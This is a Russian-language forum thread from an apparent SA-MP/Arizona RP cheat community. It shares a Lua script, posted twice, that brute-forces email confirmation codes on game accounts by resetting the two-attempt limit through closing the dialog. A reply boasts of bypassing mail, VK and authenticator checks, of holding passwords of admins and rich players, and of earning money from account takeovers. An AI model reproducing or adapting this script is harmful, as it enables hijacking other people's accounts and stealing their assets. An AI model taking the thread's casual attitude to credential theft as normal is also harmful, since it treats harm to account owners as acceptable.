Lua [ARZ] Подбор кодов с почты (бесплатно!)

chapo

🫡 В армии с 17.10.2023. В ЛС НЕ ОТВЕЧАЮ
Автор темы
Друг
8,766
11,208
Всем хай, недавно появились темы с продажей скрипта для подбора кодов подтверждения с почты, но так как способ уже пофикшен (мб на вк работает, я не проверял) "сливаю" вам скрипт и способ.​
Суть способа: на ввод кода у вас есть 2 попытки, однако если нажать эскейп то попытки "восстановятся"
Код:
Lua:
script_author('xcdco', 'chapo')
local Active, Code = false, 1

require('lib.samp.events').onShowDialog = function(id, style, title, button1, button2, text)
    if Active and text:gsub('{......}', ''):find('На ваш E%-MAIL было отправлено') then
        local Skip = Code %3 == 0 
        print(Skip and 'Closed with button 0' or 'Sended code: '..('%06d'):format(Code))
        if not Skip then
            printStyledString('Try: ~y~'..('%06d'):format(Code), 500, 7)
            Code = Code + 1
        end
        sampSendDialogResponse(id, Skip and 0 or 1, nil, Skip and nil or ('%06d'):format(Code))
        sampCloseCurrentDialogWithButton(Skip and 0 or 1)
        return false
    end
end

function main()
    while not isSampAvailable() do wait(0) end
    sampRegisterChatCommand('ecode', function()
        Active = not Active
        sampAddChatMessage('Подбор кодов почты: {ffffff}'..(Active and 'включен' or 'выключен'), 0xFFff004d)
    end)
    wait(-1)
end

Саму суть способа мне показал @xcdco , так же он попросил прикрепить это фото:
W-hspdjSmkg.jpg
 

Вложения

  • email_gen.lua
    993 байт · Просмотры: 295
Последнее редактирование:

Summertime Sadness

Потрачен
188
57
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
fixed
 

xcdco

Известный
335
160
А вот

RoflHaHaWF обошел уже​

я этот способ знаю с момента его добавления.
ты думаешь я буду сливать все способы подряд?
у меня способ, который маил,вк,аунтификатор обходит за 12~ часов.
варик с знанием ТОЛЬКО ВК, 24 часа~ и ты знаешь пароль от аккаунта.

пацан делает деньги на том, что продаёт способ, я делал деньги на использовании способа.
есть пароль некотрых адм, есть пароли 9ок многих, есть пароли пару богачей с почтами.
если мне достанется способ онли с почтой - смогу ему обеспечить хорошую пасивку.


мои способы упираются ровно в то, что есть в гугле.
 
  • Ха-ха
Реакции: RoflHaHaWF

YarikVL

Известный
Проверенный
4,812
1,819
Всем хай, недавно появились темы с продажей скрипта для подбора кодов подтверждения с почты, но так как способ уже пофикшен (мб на вк работает, я не проверял) "сливаю" вам скрипт и способ.
Суть способа: на ввод кода у вас есть 2 попытки, однако если нажать эскейп то попытки "восстановятся"
Код:
Lua:
script_author('xcdco', 'chapo')
local Active, Code = false, 1

require('lib.samp.events').onShowDialog = function(id, style, title, button1, button2, text)
    if Active and text:gsub('{......}', ''):find('На ваш E%-MAIL было отправлено') then
        local Skip = Code %3 == 0
        print(Skip and 'Closed with button 0' or 'Sended code: '..('%06d'):format(Code))
        if not Skip then
            printStyledString('Try: ~y~'..('%06d'):format(Code), 500, 7)
            Code = Code + 1
        end
        sampSendDialogResponse(id, Skip and 0 or 1, nil, Skip and nil or ('%06d'):format(Code))
        sampCloseCurrentDialogWithButton(Skip and 0 or 1)
        return false
    end
end

function main()
    while not isSampAvailable() do wait(0) end
    sampRegisterChatCommand('ecode', function()
        Active = not Active
        sampAddChatMessage('Подбор кодов почты: {ffffff}'..(Active and 'включен' or 'выключен'), 0xFFff004d)
    end)
    wait(-1)
end

Саму суть способа мне показал @xcdco , так же он попросил прикрепить это фото:
W-hspdjSmkg.jpg
То написал подбор промокода, это теперь написал подбор кода с почты для взлома аккаунтов на арз.
Скоро Chapo объявят в международный розыск за подбор кода доступа к базе данных Пентагона
 
  • Нравится
Реакции: xcdco